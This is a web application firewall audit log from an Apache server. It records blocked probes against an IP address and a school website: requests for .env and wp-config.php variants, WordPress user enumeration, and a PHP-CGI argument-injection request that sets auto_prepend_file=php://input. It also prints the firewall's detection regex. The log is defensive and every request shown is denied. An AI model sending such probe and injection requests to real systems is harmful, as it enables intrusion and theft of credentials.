Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eff85831-Z--
--ea3e3472-A--
[27/Apr/2025:05:12:34 +0700] aA1aUiKLpK55oNIcEw0eBwAAAEc 103.236.140.4 55118 103.236.140.4 8181
--ea3e3472-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00
Accept-Charset: utf-8
--ea3e3472-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ea3e3472-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745705554130652 734 (- - -)
Stopwatch2: 1745705554130652 734; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ea3e3472-Z--
--1ad1b530-A--
[27/Apr/2025:05:18:49 +0700] aA1byf7FMV4FIoAOnu7KPQAAAAs 103.236.140.4 56546 103.236.140.4 8181
--1ad1b530-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--1ad1b530-C--
--1ad1b530-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1ad1b530-E--
--1ad1b530-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745705929335810 4124 (- - -)
Stopwatch2: 1745705929335810 4124; combined=2649, p1=473, p2=2147, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1ad1b530-Z--
--e82cf335-A--
[27/Apr/2025:05:23:29 +0700] aA1c4RkilNlaTSHUe098JgAAAJc 103.236.140.4 57610 103.236.140.4 8181
--e82cf335-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)
Accept-Charset: utf-8
--e82cf335-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e82cf335-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745706209640835 780 (- - -)
Stopwatch2: 1745706209640835 780; combined=304, p1=265, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e82cf335-Z--
--02564919-A--
[27/Apr/2025:05:48:36 +0700] aA1ixMO7TUCRYJ_xflcVYwAAAMI 103.236.140.4 35204 103.236.140.4 8181
--02564919-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--02564919-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--02564919-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745707716897223 884 (- - -)
Stopwatch2: 1745707716897223 884; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=89, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--02564919-Z--
--c5d70f1d-A--
[27/Apr/2025:06:10:19 +0700] aA1n28O7TUCRYJ_xflcXPQAAAMI 103.236.140.4 43360 103.236.140.4 8181
--c5d70f1d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8
Accept-Charset: utf-8
--c5d70f1d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c5d70f1d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745709019994114 802 (- - -)
Stopwatch2: 1745709019994114 802; combined=376, p1=346, p2=0, p3=0, p4=0, p5=30, sr=134, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c5d70f1d-Z--
--bfca1c4b-A--
[27/Apr/2025:07:47:51 +0700] aA1-t8O7TUCRYJ_xflce1wAAANI 103.236.140.4 40880 103.236.140.4 8181
--bfca1c4b-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://smkn22-jkt.sch.id
Host: smkn22-jkt.sch.id
X-Real-IP: 45.206.72.214
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.206.72.214
X-Forwarded-Proto: https
Connection: close
Origin: https://smkn22-jkt.sch.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
--bfca1c4b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bfca1c4b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745714871762539 3062 (- - -)
Stopwatch2: 1745714871762539 3062; combined=1373, p1=424, p2=916, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bfca1c4b-Z--
--76749f19-A--
[27/Apr/2025:08:13:35 +0700] aA2EvxkilNlaTSHUe0-G5AAAAII 103.236.140.4 46862 103.236.140.4 8181
--76749f19-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/WIFI Language/zh_CN
Accept-Charset: utf-8
--76749f19-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76749f19-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745716415078615 748 (- - -)
Stopwatch2: 1745716415078615 748; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76749f19-Z--
--a06e260b-A--
[27/Apr/2025:08:14:27 +0700] aA2E88O7TUCRYJ_xflcgJwAAANc 103.236.140.4 47062 103.236.140.4 8181
--a06e260b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: W3C_Validator/1.305.2.12 libwww-perl/5.64
Accept-Charset: utf-8
--a06e260b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a06e260b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745716467081081 834 (- - -)
Stopwatch2: 1745716467081081 834; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a06e260b-Z--
--51398832-A--
[27/Apr/2025:09:13:26 +0700] aA2SxhkilNlaTSHUe0-L5QAAAJM 103.236.140.4 38520 103.236.140.4 8181
--51398832-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 157.230.154.6
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 157.230.154.6
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--51398832-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--51398832-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745720006177532 965 (- - -)
Stopwatch2: 1745720006177532 965; combined=403, p1=350, p2=0, p3=0, p4=0, p5=52, sr=122, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--51398832-Z--
--28570e5e-A--
[27/Apr/2025:09:42:48 +0700] aA2ZqP7FMV4FIoAOnu7e4wAAABc 103.236.140.4 45382 103.236.140.4 8181
--28570e5e-B--
GET /wp-config.php2 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--28570e5e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--28570e5e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721768237064 870 (- - -)
Stopwatch2: 1745721768237064 870; combined=376, p1=335, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--28570e5e-Z--
--2e63ed5a-A--
[27/Apr/2025:09:42:48 +0700] aA2ZqMO7TUCRYJ_xflcmygAAAMo 103.236.140.4 45384 103.236.140.4 8181
--2e63ed5a-B--
GET /wp-config.php3 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--2e63ed5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e63ed5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721768771390 857 (- - -)
Stopwatch2: 1745721768771390 857; combined=358, p1=310, p2=0, p3=0, p4=0, p5=48, sr=118, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e63ed5a-Z--
--fc9d9b03-A--
[27/Apr/2025:09:42:49 +0700] aA2ZqRkilNlaTSHUe0-NjQAAAIs 103.236.140.4 45390 103.236.140.4 8181
--fc9d9b03-B--
GET /wp-config.php4 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--fc9d9b03-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fc9d9b03-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721769653253 826 (- - -)
Stopwatch2: 1745721769653253 826; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=122, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fc9d9b03-Z--
--bb9b263f-A--
[27/Apr/2025:09:42:50 +0700] aA2Zqv7FMV4FIoAOnu7e5QAAAAM 103.236.140.4 45396 103.236.140.4 8181
--bb9b263f-B--
GET /wp-config.php5 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--bb9b263f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bb9b263f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721770180462 747 (- - -)
Stopwatch2: 1745721770180462 747; combined=316, p1=268, p2=0, p3=0, p4=0, p5=47, sr=105, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bb9b263f-Z--
--d6449d32-A--
[27/Apr/2025:09:42:50 +0700] aA2ZqhkilNlaTSHUe0-NjgAAAIo 103.236.140.4 45398 103.236.140.4 8181
--d6449d32-B--
GET /wp-config.php6 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--d6449d32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d6449d32-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721770726919 668 (- - -)
Stopwatch2: 1745721770726919 668; combined=251, p1=217, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6449d32-Z--
--4eebb33d-A--
[27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0tqwAAAFA 103.236.140.4 45404 103.236.140.4 8181
--4eebb33d-B--
GET /wp-config.php7 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--4eebb33d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4eebb33d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721771237525 867 (- - -)
Stopwatch2: 1745721771237525 867; combined=380, p1=316, p2=0, p3=0, p4=0, p5=63, sr=118, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4eebb33d-Z--
--8a60ee1e-A--
[27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0trAAAAEs 103.236.140.4 45406 103.236.140.4 8181
--8a60ee1e-B--
GET /wp-config.php8 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--8a60ee1e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8a60ee1e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721771796178 684 (- - -)
Stopwatch2: 1745721771796178 684; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8a60ee1e-Z--
--54c15377-A--
[27/Apr/2025:09:42:52 +0700] aA2ZrCKLpK55oNIcEw0trQAAAEw 103.236.140.4 45412 103.236.140.4 8181
--54c15377-B--
GET /wp-config.php9 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--54c15377-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--54c15377-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721772326271 756 (- - -)
Stopwatch2: 1745721772326271 756; combined=291, p1=253, p2=0, p3=0, p4=0, p5=38, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--54c15377-Z--
--08ca9d64-A--
[27/Apr/2025:09:42:52 +0700] aA2ZrP7FMV4FIoAOnu7e5gAAAAA 103.236.140.4 45414 103.236.140.4 8181
--08ca9d64-B--
GET /wp-config.php10 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Accept: */*
--08ca9d64-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--08ca9d64-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745721772832521 705 (- - -)
Stopwatch2: 1745721772832521 705; combined=276, p1=239, p2=0, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--08ca9d64-Z--
--622b243d-A--
[27/Apr/2025:09:42:53 +0700] aA2Zrf7FMV4FIoAOnu7e5wAAAAU 103.236.140.4 45420 103.236.140.4 8181
--622b243d-B--
GET /wp-config.php11 HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 192.42.116.173
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.42.116.173
X-Forwarded-Proto: http
Connection: close
